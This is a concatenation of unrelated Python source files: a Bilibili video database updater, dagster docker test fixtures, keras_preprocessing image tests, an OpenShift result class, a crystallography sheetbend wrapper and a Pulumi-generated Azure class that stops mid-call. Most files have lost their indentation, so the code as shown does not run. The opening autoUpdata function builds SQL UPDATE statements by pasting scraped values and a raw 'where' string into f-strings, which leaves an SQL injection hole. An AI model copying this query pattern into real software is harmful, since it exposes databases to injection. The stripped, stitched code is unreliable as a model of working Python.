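# injection issues; this shows that style for the same table.
def read_by_av(av):
    conn = dblink()
    cursor = conn.cursor()
    cursor.execute("SELECT * FROM `nav_bili_v` WHERE `av` = %s", (av,))
    rows = cursor.fetchall()
    dbclose(cursor, conn)
    return rows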
def autoUpdata(where=''):
where1 = where2 = ''  # default to empty filters so the queries below work when no condition is given
if(where!=''):
where1 = 'WHERE ' + where
where2 = 'AND ' + where
conn = dblink()
# first query: read the list of av ids
sql_r = f"""SELECT * FROM `nav_bili_v` {where1}"""
cursor = dbsql(conn, sql_r)
av_list = cursor.fetchall()
# close only the cursor so the connection stays open for the updates below
cursor.close()
# second pass: scrape info for each av and update the table
i = 0
for row in av_list[:]:
av = row[1]
try:
dic = Aid(av).dic
time.sleep(0.3)  # crawl politely and avoid getting the IP banned
sql_u = """UPDATE `nav_bili_v` """
sql_u_temp = 'SET '
for value in dic.values():
for k,v in value.items():
sql_u_temp += f"`{k}`='{v[1]}',"
sql_u_temp = f'''{sql_u_temp[:-1]} WHERE `av`={av} {where2}'''
sql_u += sql_u_temp
cursor = dbsql(conn, sql_u)
print(f'[item {i}] av:{av} updated successfully')
except:
print(f'[item {i}] av:{av} update FAILED')
i+=1
print('\nAll rows in the table have been updated')
dbclose(cursor, conn)
|
# Copyright (c) 2013 eBay Inc.
# Copyright (c) OpenStack Foundation
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or
# implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""
QoS Specs interface.
"""
from cinderclient.v2.qos_specs import * # noqa
|
"""Unit test package for ziphyr."""
|
import os
import subprocess
import time
from contextlib import contextmanager
import grpc
import pytest
from dagster_test.dagster_core_docker_buildkite import (
build_and_tag_test_image,
test_project_docker_image,
)
from dagster import check
from dagster.grpc.client import DagsterGrpcClient
from dagster.utils import file_relative_path
IS_BUILDKITE = os.getenv('BUILDKITE') is not None
HARDCODED_PORT = 8090
@pytest.fixture(scope='session')
def dagster_docker_image():
docker_image = test_project_docker_image()
if not IS_BUILDKITE:
# Being conservative here when first introducing this. This could fail
# if the Docker daemon is not running, so for now we just skip the tests using this
# fixture if the build fails, and warn with the output from the build command
try:
build_and_tag_test_image(docker_image)
except subprocess.CalledProcessError as exc_info:
pytest.skip(
"Skipped container tests due to a failure when trying to build the image. "
"Most likely, the docker daemon is not running.\n"
"Output:\n{}".format(exc_info.output.decode())
)
return docker_image
def wait_for_connection(host, port):
retry_limit = 20
while retry_limit:
try:
if DagsterGrpcClient(host=host, port=port).ping("ready") == "ready":
return True
except grpc.RpcError:
pass
time.sleep(0.2)
retry_limit -= 1
pytest.skip(
"Skipped grpc container tests due to a failure when trying to connect to the GRPC server "
"at {host}:{port}".format(host=host, port=port)
)
@contextmanager
def docker_service_up(docker_compose_file, service_name):
check.str_param(service_name, 'service_name')
check.str_param(docker_compose_file, 'docker_compose_file')
check.invariant(
os.path.isfile(docker_compose_file), 'docker_compose_file must specify a valid file'
)
if not IS_BUILDKITE:
env = os.environ.copy()
env["IMAGE_NAME"] = test_project_docker_image()
try:
subprocess.check_output(
['docker-compose', '-f', docker_compose_file, 'stop', service_name], env=env,
)
subprocess.check_output(
['docker-compose', '-f', docker_compose_file, 'rm', '-f', service_name], env=env,
)
except Exception: # pylint: disable=broad-except
pass
subprocess.check_output(
['docker-compose', '-f', docker_compose_file, 'up', '-d', service_name], env=env,
)
yield
@pytest.fixture(scope='session')
def grpc_host():
# In buildkite we get the ip address from this variable (see buildkite code for commentary)
# Otherwise assume local development and assume localhost
env_name = 'GRPC_SERVER_HOST'
if env_name not in os.environ:
os.environ[env_name] = 'localhost'
return os.environ[env_name]
@pytest.fixture(scope='session')
def grpc_port():
yield HARDCODED_PORT
@pytest.fixture(scope='session')
def docker_grpc_client(
dagster_docker_image, grpc_host, grpc_port
): # pylint: disable=redefined-outer-name, unused-argument
if not IS_BUILDKITE:
    # docker_service_up is a context manager, so it must be entered for the
    # docker-compose service to actually be started
    with docker_service_up(file_relative_path(__file__, 'docker-compose.yml'), 'dagster-grpc-server'):
        wait_for_connection(grpc_host, grpc_port)
        yield DagsterGrpcClient(port=grpc_port, host=grpc_host)
    return
wait_for_connection(grpc_host, grpc_port)
yield DagsterGrpcClient(port=grpc_port, host=grpc_host)
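# --- illustrative sketch (hedged): a hypothetical test that is not part of the original
# module, showing how the session-scoped docker_grpc_client fixture could be consumed.
# ping() echoing its argument is the same health check used in wait_for_connection above.
def test_grpc_server_ping(docker_grpc_client):  # pylint: disable=redefined-outer-name
    assert docker_grpc_client.ping("ready") == "ready"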
|
import io
import resource
from pathlib import Path
import numpy as np
import PIL
import pytest
from keras_preprocessing.image import utils
def test_validate_filename(tmpdir):
valid_extensions = ('png', 'jpg')
filename = tmpdir.ensure('test.png')
assert utils.validate_filename(str(filename), valid_extensions)
filename = tmpdir.ensure('test.PnG')
assert utils.validate_filename(str(filename), valid_extensions)
filename = tmpdir.ensure('test.some_extension')
assert not utils.validate_filename(str(filename), valid_extensions)
assert not utils.validate_filename('some_test_file.png', valid_extensions)
def test_load_img(tmpdir):
filename_rgb = str(tmpdir / 'rgb_utils.png')
filename_rgba = str(tmpdir / 'rgba_utils.png')
filename_grayscale_8bit = str(tmpdir / 'grayscale_8bit_utils.png')
filename_grayscale_16bit = str(tmpdir / 'grayscale_16bit_utils.tiff')
filename_grayscale_32bit = str(tmpdir / 'grayscale_32bit_utils.tiff')
original_rgb_array = np.array(255 * np.random.rand(100, 100, 3),
dtype=np.uint8)
original_rgb = utils.array_to_img(original_rgb_array, scale=False)
original_rgb.save(filename_rgb)
original_rgba_array = np.array(255 * np.random.rand(100, 100, 4),
dtype=np.uint8)
original_rgba = utils.array_to_img(original_rgba_array, scale=False)
original_rgba.save(filename_rgba)
original_grayscale_8bit_array = np.array(255 * np.random.rand(100, 100, 1),
dtype=np.uint8)
original_grayscale_8bit = utils.array_to_img(original_grayscale_8bit_array,
scale=False)
original_grayscale_8bit.save(filename_grayscale_8bit)
original_grayscale_16bit_array = np.array(
np.random.randint(-2147483648, 2147483647, (100, 100, 1)), dtype=np.int16
)
original_grayscale_16bit = utils.array_to_img(original_grayscale_16bit_array,
scale=False, dtype='int16')
original_grayscale_16bit.save(filename_grayscale_16bit)
original_grayscale_32bit_array = np.array(
np.random.randint(-2147483648, 2147483647, (100, 100, 1)), dtype=np.int32
)
original_grayscale_32bit = utils.array_to_img(original_grayscale_32bit_array,
scale=False, dtype='int32')
original_grayscale_32bit.save(filename_grayscale_32bit)
# Test that loaded image is exactly equal to original.
loaded_im = utils.load_img(filename_rgb)
loaded_im_array = utils.img_to_array(loaded_im)
assert loaded_im_array.shape == original_rgb_array.shape
assert np.all(loaded_im_array == original_rgb_array)
loaded_im = utils.load_img(filename_rgba, color_mode='rgba')
loaded_im_array = utils.img_to_array(loaded_im)
assert loaded_im_array.shape == original_rgba_array.shape
assert np.all(loaded_im_array == original_rgba_array)
loaded_im = utils.load_img(filename_rgb, color_mode='grayscale')
loaded_im_array = utils.img_to_array(loaded_im)
assert loaded_im_array.shape == (original_rgb_array.shape[0],
original_rgb_array.shape[1], 1)
loaded_im = utils.load_img(filename_grayscale_8bit, color_mode='grayscale')
loaded_im_array = utils.img_to_array(loaded_im)
assert loaded_im_array.shape == original_grayscale_8bit_array.shape
assert np.all(loaded_im_array == original_grayscale_8bit_array)
loaded_im = utils.load_img(filename_grayscale_16bit, color_mode='grayscale')
loaded_im_array = utils.img_to_array(loaded_im, dtype='int16')
assert loaded_im_array.shape == original_grayscale_16bit_array.shape
assert np.all(loaded_im_array == original_grayscale_16bit_array)
# test casting int16 image to float32
loaded_im_array = utils.img_to_array(loaded_im)
assert np.allclose(loaded_im_array, original_grayscale_16bit_array)
loaded_im = utils.load_img(filename_grayscale_32bit, color_mode='grayscale')
loaded_im_array = utils.img_to_array(loaded_im, dtype='int32')
assert loaded_im_array.shape == original_grayscale_32bit_array.shape
assert np.all(loaded_im_array == original_grayscale_32bit_array)
# test casting int32 image to float32
loaded_im_array = utils.img_to_array(loaded_im)
assert np.allclose(loaded_im_array, original_grayscale_32bit_array)
# Test that nothing is changed when target size is equal to original.
loaded_im = utils.load_img(filename_rgb, target_size=(100, 100))
loaded_im_array = utils.img_to_array(loaded_im)
assert loaded_im_array.shape == original_rgb_array.shape
assert np.all(loaded_im_array == original_rgb_array)
loaded_im = utils.load_img(filename_rgba, color_mode='rgba',
target_size=(100, 100))
loaded_im_array = utils.img_to_array(loaded_im)
assert loaded_im_array.shape == original_rgba_array.shape
assert np.all(loaded_im_array == original_rgba_array)
loaded_im = utils.load_img(filename_rgb, color_mode='grayscale',
target_size=(100, 100))
loaded_im_array = utils.img_to_array(loaded_im)
assert loaded_im_array.shape == (original_rgba_array.shape[0],
original_rgba_array.shape[1], 1)
loaded_im = utils.load_img(filename_grayscale_8bit, color_mode='grayscale',
target_size=(100, 100))
loaded_im_array = utils.img_to_array(loaded_im)
assert loaded_im_array.shape == original_grayscale_8bit_array.shape
assert np.all(loaded_im_array == original_grayscale_8bit_array)
loaded_im = utils.load_img(filename_grayscale_16bit, color_mode='grayscale',
target_size=(100, 100))
loaded_im_array = utils.img_to_array(loaded_im, dtype='int16')
assert loaded_im_array.shape == original_grayscale_16bit_array.shape
assert np.all(loaded_im_array == original_grayscale_16bit_array)
loaded_im = utils.load_img(filename_grayscale_32bit, color_mode='grayscale',
target_size=(100, 100))
loaded_im_array = utils.img_to_array(loaded_im, dtype='int32')
assert loaded_im_array.shape == original_grayscale_32bit_array.shape
assert np.all(loaded_im_array == original_grayscale_32bit_array)
# Test down-sampling with bilinear interpolation.
loaded_im = utils.load_img(filename_rgb, target_size=(25, 25))
loaded_im_array = utils.img_to_array(loaded_im)
assert loaded_im_array.shape == (25, 25, 3)
loaded_im = utils.load_img(filename_rgba, color_mode='rgba',
target_size=(25, 25))
loaded_im_array = utils.img_to_array(loaded_im)
assert loaded_im_array.shape == (25, 25, 4)
loaded_im = utils.load_img(filename_rgb, color_mode='grayscale',
target_size=(25, 25))
loaded_im_array = utils.img_to_array(loaded_im)
assert loaded_im_array.shape == (25, 25, 1)
loaded_im = utils.load_img(filename_grayscale_8bit, color_mode='grayscale',
target_size=(25, 25))
loaded_im_array = utils.img_to_array(loaded_im)
assert loaded_im_array.shape == (25, 25, 1)
loaded_im = utils.load_img(filename_grayscale_16bit, color_mode='grayscale',
target_size=(25, 25))
loaded_im_array = utils.img_to_array(loaded_im, dtype='int16')
assert loaded_im_array.shape == (25, 25, 1)
loaded_im = utils.load_img(filename_grayscale_32bit, color_mode='grayscale',
target_size=(25, 25))
loaded_im_array = utils.img_to_array(loaded_im, dtype='int32')
assert loaded_im_array.shape == (25, 25, 1)
# Test down-sampling with nearest neighbor interpolation.
loaded_im_nearest = utils.load_img(filename_rgb, target_size=(25, 25),
interpolation="nearest")
loaded_im_array_nearest = utils.img_to_array(loaded_im_nearest)
assert loaded_im_array_nearest.shape == (25, 25, 3)
assert np.any(loaded_im_array_nearest != loaded_im_array)
loaded_im_nearest = utils.load_img(filename_rgba, color_mode='rgba',
target_size=(25, 25),
interpolation="nearest")
loaded_im_array_nearest = utils.img_to_array(loaded_im_nearest)
assert loaded_im_array_nearest.shape == (25, 25, 4)
assert np.any(loaded_im_array_nearest != loaded_im_array)
loaded_im = utils.load_img(filename_grayscale_8bit, color_mode='grayscale',
target_size=(25, 25), interpolation="nearest")
loaded_im_array = utils.img_to_array(loaded_im)
assert loaded_im_array.shape == (25, 25, 1)
loaded_im = utils.load_img(filename_grayscale_16bit, color_mode='grayscale',
target_size=(25, 25), interpolation="nearest")
loaded_im_array = utils.img_to_array(loaded_im, dtype='int16')
assert loaded_im_array.shape == (25, 25, 1)
loaded_im = utils.load_img(filename_grayscale_32bit, color_mode='grayscale',
target_size=(25, 25), interpolation="nearest")
loaded_im_array = utils.img_to_array(loaded_im, dtype='int32')
assert loaded_im_array.shape == (25, 25, 1)
# Test different path type
with open(filename_grayscale_32bit, 'rb') as f:
_path = io.BytesIO(f.read())  # io.BytesIO
loaded_im = utils.load_img(_path, color_mode='grayscale')
loaded_im_array = utils.img_to_array(loaded_im, dtype=np.int32)
assert np.all(loaded_im_array == original_grayscale_32bit_array)
_path = filename_grayscale_32bit # str
loaded_im = utils.load_img(_path, color_mode='grayscale')
loaded_im_array = utils.img_to_array(loaded_im, dtype=np.int32)
assert np.all(loaded_im_array == original_grayscale_32bit_array)
_path = filename_grayscale_32bit.encode() # bytes
loaded_im = utils.load_img(_path, color_mode='grayscale')
loaded_im_array = utils.img_to_array(loaded_im, dtype=np.int32)
assert np.all(loaded_im_array == original_grayscale_32bit_array)
_path = Path(tmpdir / 'grayscale_32bit_utils.tiff') # Path
loaded_im = utils.load_img(_path, color_mode='grayscale')
loaded_im_array = utils.img_to_array(loaded_im, dtype=np.int32)
assert np.all(loaded_im_array == original_grayscale_32bit_array)
# Check that exception is raised if interpolation not supported.
loaded_im = utils.load_img(filename_rgb, interpolation="unsupported")
with pytest.raises(ValueError):
loaded_im = utils.load_img(filename_rgb, target_size=(25, 25),
interpolation="unsupported")
# Check that the aspect ratio of a square is the same
filename_red_square = str(tmpdir / 'red_square_utils.png')
A = np.zeros((50, 100, 3), dtype=np.uint8) # rectangle image 100x50
A[20:30, 45:55, 0] = 255 # red square 10x10
red_square_array = np.array(A)
red_square = utils.array_to_img(red_square_array, scale=False)
red_square.save(filename_red_square)
loaded_im = utils.load_img(filename_red_square, target_size=(25, 25),
keep_aspect_ratio=True)
loaded_im_array = utils.img_to_array(loaded_im)
assert loaded_im_array.shape == (25, 25, 3)
red_channel_arr = loaded_im_array[:, :, 0].astype(bool)
square_width = np.sum(np.sum(red_channel_arr, axis=0))
square_height = np.sum(np.sum(red_channel_arr, axis=1))
aspect_ratio_result = square_width / square_height
# original square had 1:1 ratio
assert aspect_ratio_result == pytest.approx(1.0)
def test_list_pictures(tmpdir):
filenames = ['test.png', 'test0.jpg', 'test-1.jpeg', '2test.bmp',
'2-test.ppm', '3.png', '1.jpeg', 'test.bmp', 'test0.ppm',
'test4.tiff', '5-test.tif', 'test.txt', 'foo.csv',
'face.gif', 'bar.txt']
subdirs = ['', 'subdir1', 'subdir2']
filenames = [tmpdir.ensure(subdir, f) for subdir in subdirs
for f in filenames]
found_images = utils.list_pictures(str(tmpdir))
assert len(found_images) == 33
found_images = utils.list_pictures(str(tmpdir), ext='png')
assert len(found_images) == 6
def test_array_to_img_and_img_to_array():
height, width = 10, 8
# Test the data format
# Test RGB 3D
x = np.random.random((3, height, width))
img = utils.array_to_img(x, data_format='channels_first')
assert img.size == (width, height)
x = utils.img_to_array(img, data_format='channels_first')
assert x.shape == (3, height, width)
# Test RGBA 3D
x = np.random.random((4, height, width))
img = utils.array_to_img(x, data_format='channels_first')
assert img.size == (width, height)
x = utils.img_to_array(img, data_format='channels_first')
assert x.shape == (4, height, width)
# Test 2D
x = np.random.random((1, height, width))
img = utils.array_to_img(x, data_format='channels_first')
assert img.size == (width, height)
x = utils.img_to_array(img, data_format='channels_first')
assert x.shape == (1, height, width)
# grayscale 32-bit signed integer
x = np.array(
np.random.randint(-2147483648, 2147483647, (1, height, width)),
dtype=np.int32
)
img = utils.array_to_img(x, data_format='channels_first')
assert img.size == (width, height)
x = utils.img_to_array(img, data_format='channels_first')
assert x.shape == (1, height, width)
# Test tf data format
# Test RGB 3D
x = np.random.random((height, width, 3))
img = utils.array_to_img(x, data_format='channels_last')
assert img.size == (width, height)
x = utils.img_to_array(img, data_format='channels_last')
assert x.shape == (height, width, 3)
# Test RGBA 3D
x = np.random.random((height, width, 4))
img = utils.array_to_img(x, data_format='channels_last')
assert img.size == (width, height)
x = utils.img_to_array(img, data_format='channels_last')
assert x.shape == (height, width, 4)
# Test 2D
x = np.random.random((height, width, 1))
img = utils.array_to_img(x, data_format='channels_last')
assert img.size == (width, height)
x = utils.img_to_array(img, data_format='channels_last')
assert x.shape == (height, width, 1)
# grayscale 16-bit signed integer
x = np.array(
np.random.randint(-2147483648, 2147483647, (height, width, 1)),
dtype=np.int16
)
img = utils.array_to_img(x, data_format='channels_last')
assert img.size == (width, height)
x = utils.img_to_array(img, data_format='channels_last')
assert x.shape == (height, width, 1)
# grayscale 32-bit signed integer
x = np.array(
np.random.randint(-2147483648, 2147483647, (height, width, 1)),
dtype=np.int32
)
img = utils.array_to_img(x, data_format='channels_last')
assert img.size == (width, height)
x = utils.img_to_array(img, data_format='channels_last')
assert x.shape == (height, width, 1)
# Test invalid use case
with pytest.raises(ValueError):
x = np.random.random((height, width)) # not 3D
img = utils.array_to_img(x, data_format='channels_first')
with pytest.raises(ValueError):
x = np.random.random((height, width, 3))
# unknown data_format
img = utils.array_to_img(x, data_format='channels')
with pytest.raises(ValueError):
# neither RGB, RGBA, or gray-scale
x = np.random.random((height, width, 5))
img = utils.array_to_img(x, data_format='channels_last')
with pytest.raises(ValueError):
x = np.random.random((height, width, 3))
# unknown data_format
img = utils.img_to_array(x, data_format='channels')
with pytest.raises(ValueError):
# neither RGB, RGBA, or gray-scale
x = np.random.random((height, width, 5, 3))
img = utils.img_to_array(x, data_format='channels_last')
def write_sample_image(tmpdir):
im = utils.array_to_img(np.random.rand(1, 1, 3))
path = str(tmpdir / 'sample_image.png')
utils.save_img(path, im)
return path
def test_image_file_handlers_close(tmpdir):
path = write_sample_image(tmpdir)
max_open_files, _ = resource.getrlimit(resource.RLIMIT_NOFILE)
for i in range(max_open_files+1):
utils.load_img(path)
def test_load_img_returns_image(tmpdir):
path = write_sample_image(tmpdir)
im = utils.load_img(path)
assert isinstance(im, PIL.Image.Image)
if __name__ == '__main__':
pytest.main([__file__])
|
"""This module contains unit tests for stream module."""
import pytest
import pseudo
__author__ = "Patryk Niedźwiedziński"
@pytest.fixture
def stream():
"""Returns stream object"""
def _s(i):
s = pseudo.stream.Stream(i)
return s
return _s
@pytest.mark.timeout(2)
def test_get_current_line(stream, test):
s = stream("a\nb")
test(s.get_current_line(), "a")
s.line += 1
test(s.get_current_line(), "b")
@pytest.mark.timeout(2)
def test_next_line(stream):
"""Checks Stream.next_line"""
s = stream("1\n2")
s.next_line()
if "2" != s.peek():
print(s.peek())
raise AssertionError
@pytest.mark.timeout(2)
def test_next(stream):
"""Checks Stream.next"""
s = stream("1\n")
if "1" != s.next():
print(s.next())
raise AssertionError
@pytest.mark.timeout(2)
def test_eol(stream):
"""Checks Stream.eol"""
s = stream("\n1\n")
if not s.eol():
raise AssertionError
s.next_line()
if s.eol():
raise AssertionError
s.next()
if not s.eol():
raise AssertionError
@pytest.mark.timeout(2)
def test_eof(stream):
"""Checks Stream.eof"""
s = stream("1")
if s.eof():
raise AssertionError
s.next()
if not s.eof():
raise AssertionError
@pytest.mark.timeout(2)
def test_throw(stream):
"""Checks Stream.throw"""
s = stream("test")
try:
s.throw("Error")
except SystemExit:
pass
else:
raise AssertionError
|
from __future__ import absolute_import
import json
from .model import OpenShiftPythonException
class Result(object):
def __init__(self, high_level_operation, tracking_limit=None):
self.high_level_operation = high_level_operation
self.__actions = []
# a tracking_limit that is None or negative means unlimited action tracking
if tracking_limit is not None and tracking_limit >= 0:
self.limit_tracking_actions = tracking_limit
else:
self.limit_tracking_actions = None
def actions(self):
my_list = [a for a in self.__actions if not a.internal]
return my_list
# Returns a bitwise OR of all underlying action statuses (if 0, all actions returned 0)
def status(self):
s = 0
for action in self.__actions:
# If not the last attempt, return status does not matter; errors ignored.
if action.last_attempt:
s |= int(action.status)
return s
# Returns aggregate stdout from all underlying actions
def out(self):
s = u''
for action in self.__actions:
if action.out:
s += action.out
if not s.endswith("\n"):
s += u'\n'
return s
def get_timeout(self):
"""
:return: Iterates through all actions in this Result and returns the first Action object
it finds that indicates it timed out. If no action timed out, returns None.
"""
for action in self.__actions:
if action.timeout:
return action
return None
# Returns aggregate stderr from all underlying actions
def err(self):
s = u''
for action in self.__actions:
if action.err:
s += action.err
if not s.endswith("\n"):
s += u'\n'
return s
def as_dict(self, truncate_stdout=-1, redact_tokens=True, redact_streams=True, redact_references=True):
m = {
"operation": self.high_level_operation,
"status": self.status(),
"actions": [action.as_dict(truncate_stdout=truncate_stdout, redact_tokens=redact_tokens,
redact_references=redact_references,
redact_streams=redact_streams) for action in self.__actions]
}
return m
def as_json(self, indent=4, truncate_stdout=-1, redact_tokens=True, redact_streams=True, redact_references=True):
return json.dumps(
self.as_dict(truncate_stdout=truncate_stdout, redact_tokens=redact_tokens,
redact_references=redact_references, redact_streams=redact_streams),
indent=indent)
def add_action(self, action):
self.__actions.append(action)
if self.limit_tracking_actions is not None and len(self.__actions) > self.limit_tracking_actions:
self.__actions.pop(0)
def add_result(self, result):
self.__actions.extend(result.__actions)
def __repr__(self):
return self.as_json()
def fail_if(self, msg):
if self.get_timeout():
msg += " (Timeout during: {})".format(self.get_timeout().as_dict()['cmd'])
if self.status() != 0:
raise OpenShiftPythonException(msg, self)
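# --- illustrative sketch (hedged, not part of the original module) ---
# Result only reads a few attributes from the action objects it tracks (internal,
# status, last_attempt, out, err, timeout), so a tiny stub is enough to show how
# status() aggregates per-action exit codes. _StubAction and _example_result_usage
# are hypothetical; the real Action class lives elsewhere in this package.
class _StubAction(object):
    def __init__(self, status, out=u'', err=u''):
        self.internal = False
        self.status = status
        self.last_attempt = True
        self.out = out
        self.err = err
        self.timeout = False

def _example_result_usage():
    result = Result("demo operation", tracking_limit=10)
    result.add_action(_StubAction(0, out=u'first step ok'))
    result.add_action(_StubAction(1, err=u'second step failed'))
    combined = result.status()         # bitwise OR of per-action statuses -> 1
    print(result.out(), result.err())  # aggregated stdout / stderr
    if combined != 0:
        result.fail_if("demo operation failed")  # raises OpenShiftPythonException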
|
#!/usr/bin/env ccp4-python
"""Module to run sheetbend on a model"""
__author__ = "Adam Simpkin"
__date__ = "05 Aug 2018"
__version__ = "1.0"
import os
from simbad.util import mtz_util
from simbad.mr.refmac_refine import Refmac
from pyjob import cexec
class SheetBend(object):
"""Class to run sheetbend"""
def __init__(self, hklin, hklout, logfile, pdbin, pdbout, work_dir):
self._hklin = None
self._hklout = None
self._logfile = None
self._pdbin = None
self._pdbout = None
self._work_dir = None
# Temporary path for testing
self.exe = "/data1/opt/devtoolsTrunk/install/bin/csheetbend"
self.hklin = hklin
self.hklout = hklout
self.logfile = logfile
self.pdbin = pdbin
self.pdbout = pdbout
self.work_dir = work_dir
self.check_sheetbend_exe()
@property
def hklin(self):
"""The input hkl file"""
return self._hklin
@hklin.setter
def hklin(self, hklin):
"""Define the input hkl file"""
self._hklin = hklin
@property
def hklout(self):
"""The output hkl file"""
return self._hklout
@hklout.setter
def hklout(self, hklout):
"""Define the output hkl file"""
self._hklout = hklout
@property
def logfile(self):
"""The logfile output"""
return self._logfile
@logfile.setter
def logfile(self, logfile):
"""Define the output logfile"""
self._logfile = logfile
@property
def pdbin(self):
"""The input pdb file"""
return self._pdbin
@pdbin.setter
def pdbin(self, pdbin):
"""Define the input pdb file"""
self._pdbin = pdbin
@property
def pdbout(self):
"""The output pdb file"""
return self._pdbout
@pdbout.setter
def pdbout(self, pdbout):
"""Define the output pdb file"""
self._pdbout = pdbout
@property
def work_dir(self):
"""The path to the working directory"""
return self._work_dir
@work_dir.setter
def work_dir(self, work_dir):
"""Define the working directory"""
self._work_dir = work_dir
def check_sheetbend_exe(self):
if not os.path.isfile(self.exe):
msg = "Sheetbend executable {0} not found".format(self.exe)
raise RuntimeError(msg)
def run(self, ncyc=100):
# Make a note of the current working directory
current_work_dir = os.getcwd()
# Change to the sheetbend working directory
if os.path.exists(self.work_dir):
os.chdir(self.work_dir)
else:
os.makedirs(self.work_dir)
os.chdir(self.work_dir)
tmp_pdb = os.path.join(self.work_dir, "sheetbend.pdb")
SheetBend.sheetbend(self.exe, self.hklin, self.pdbin, tmp_pdb, ncyc, self.logfile)
# Perform a cycle of Refmac to get output hkl
key = "ncyc 10"
Refmac.refmac(self.hklin, self.hklout, tmp_pdb, self.pdbout, self.logfile, key)
# Return to original working directory
os.chdir(current_work_dir)
@staticmethod
def sheetbend(exe, hklin, pdbin, pdbout, ncyc, logfile):
"""Function to run refinement using sheetbend
Parameters
----------
hklin : str
Path to the input hkl file
pdbin : str
Path to the input pdb
pdbout : str
Path to the output pdb
ncyc : int
Number of cycles to run
logfile : str
Path to the output log
Returns
-------
file
Output pdb file
file
Output log file
"""
mtz_labels = mtz_util.GetLabels(hklin)
colin = "{0},{1}".format(mtz_labels.f, mtz_labels.sigf)
cmd = [exe, "--pdbin", pdbin, "--mtzin", hklin, "--pdbout", pdbout, "--colin-fo", colin, "-cycles", str(ncyc), "-resolution-by-cycle", "6,3"]
stdout = cexec(cmd)
with open(logfile, "w") as f_out:
f_out.write(stdout)
if __name__ == "__main__":
import argparse
parser = argparse.ArgumentParser(description="Runs refinement using sheetbend", prefix_chars="-")
group = parser.add_argument_group()
group.add_argument("-hklin", type=str, help="Path to the input hkl file")
group.add_argument("-hklout", type=str, help="Path to the output hkl file")
group.add_argument("-logfile", type=str, help="Path to the output log file")
group.add_argument("-ncyc", type=int, default=12, help="Number of cycles of refinement to run")
group.add_argument("-pdbin", type=str, help="Path to the input pdb file")
group.add_argument("-pdbout", type=str, help="Path to the output pdb file")
group.add_argument("-work_dir", type=str, help="Path to the working directory")
args = parser.parse_args()
sheetbend = SheetBend(args.hklin, args.hklout, args.logfile, args.pdbin, args.pdbout, args.work_dir)
sheetbend.run(args.ncyc)
|
# coding=utf-8
# *** WARNING: this file was generated by the Pulumi SDK Generator. ***
# *** Do not edit by hand unless you're certain you know what you are doing! ***
import warnings
import pulumi
import pulumi.runtime
from typing import Any, Mapping, Optional, Sequence, Union
from .. import _utilities, _tables
from . import outputs
from ._enums import *
from ._inputs import *
__all__ = ['WebAppBackupConfigurationSlot']
class WebAppBackupConfigurationSlot(pulumi.CustomResource):
def __init__(__self__,
resource_name: str,
opts: Optional[pulumi.ResourceOptions] = None,
backup_name: Optional[pulumi.Input[str]] = None,
backup_schedule: Optional[pulumi.Input[pulumi.InputType['BackupScheduleArgs']]] = None,
databases: Optional[pulumi.Input[Sequence[pulumi.Input[pulumi.InputType['DatabaseBackupSettingArgs']]]]] = None,
enabled: Optional[pulumi.Input[bool]] = None,
kind: Optional[pulumi.Input[str]] = None,
name: Optional[pulumi.Input[str]] = None,
resource_group_name: Optional[pulumi.Input[str]] = None,
slot: Optional[pulumi.Input[str]] = None,
storage_account_url: Optional[pulumi.Input[str]] = None,
__props__=None,
__name__=None,
__opts__=None):
"""
Description of a backup which will be performed.
API Version: 2020-10-01.
:param str resource_name: The name of the resource.
:param pulumi.ResourceOptions opts: Options for the resource.
:param pulumi.Input[str] backup_name: Name of the backup.
:param pulumi.Input[pulumi.InputType['BackupScheduleArgs']] backup_schedule: Schedule for the backup if it is executed periodically.
:param pulumi.Input[Sequence[pulumi.Input[pulumi.InputType['DatabaseBackupSettingArgs']]]] databases: Databases included in the backup.
:param pulumi.Input[bool] enabled: True if the backup schedule is enabled (must be included in that case), false if the backup schedule should be disabled.
:param pulumi.Input[str] kind: Kind of resource.
:param pulumi.Input[str] name: Name of the app.
:param pulumi.Input[str] resource_group_name: Name of the resource group to which the resource belongs.
:param pulumi.Input[str] slot: Name of the deployment slot. If a slot is not specified, the API will update the backup configuration for the production slot.
:param pulumi.Input[str] storage_account_url: SAS URL to the container.
"""
if __name__ is not None:
warnings.warn("explicit use of __name__ is deprecated", DeprecationWarning)
resource_name = __name__
if __opts__ is not None:
warnings.warn("explicit use of __opts__ is deprecated, use 'opts' instead", DeprecationWarning)
opts = __opts__
if opts is None:
opts = pulumi.ResourceOptions()
if not isinstance(opts, pulumi.ResourceOptions):
raise TypeError('Expected resource options to be a ResourceOptions instance')
if opts.version is None:
opts.version = _utilities.get_version()
if opts.id is None:
if __props__ is not None:
raise TypeError('__props__ is only valid when passed in combination with a valid opts.id to get an existing resource')
__props__ = dict()
__props__['backup_name'] = backup_name
__props__['backup_schedule'] = backup_schedule
__props__['databases'] = databases
__props__['enabled'] = enabled
__props__['kind'] = kind
if name is None and not opts.urn:
raise TypeError("Missing required property 'name'")
__props__['name'] = name
if resource_group_name is None and not opts.urn:
raise TypeError("Missing required property 'resource_group_name'")
__props__['resource_group_name'] = resource_group_name
if slot is None and not opts.urn:
raise TypeError("Missing required property 'slot'")
__props__['slot'] = slot
if storage_account_url is None and not opts.urn:
raise TypeError("Missing required property 'storage_account_url'")
__props__['storage_account_url'] = storage_account_url
__props__['system_data'] = None
__props__['type'] = None
alias_opts = pulumi.ResourceOptions(aliases=[pulumi.Alias(type_="azure-nextgen:web/latest:WebAppBackupConfigurationSlot"), pulumi.Alias(type_="azure-nextgen:web/v20150801:WebAppBackupConfigurationSlot"), pulumi.Alias(type_="azure-nextgen:web/v20160801:WebAppBackupConfigurationSlot"), pulumi.Alias(type_="azure-nextgen:web/v20180201:WebAppBackupConfigurationSlot"), pulumi.Alias(type_="azure-nextgen:web/v20181101:WebAppBackupConfigurationSlot"), pulumi.Alias(type_="azure-nextgen:web/v20190801:WebAppBackupConfigurationSlot"), pulumi.Alias(type_="azure-nextgen:web/v20200601:WebAppBackupConfigurationSlot"), pulumi.Alias(type_="azure-nextgen:web/v20200901:WebAppBackupConfigurationSlot"), pulumi.Alias(type_="azure-nextgen:web/v20201001:WebAppBackupConfigurationSlot")])
opts = pulumi.ResourceOptions.merge(opts, alias_opts)
super(WebAppBackupConfigurationSlot, __self__).__init__(
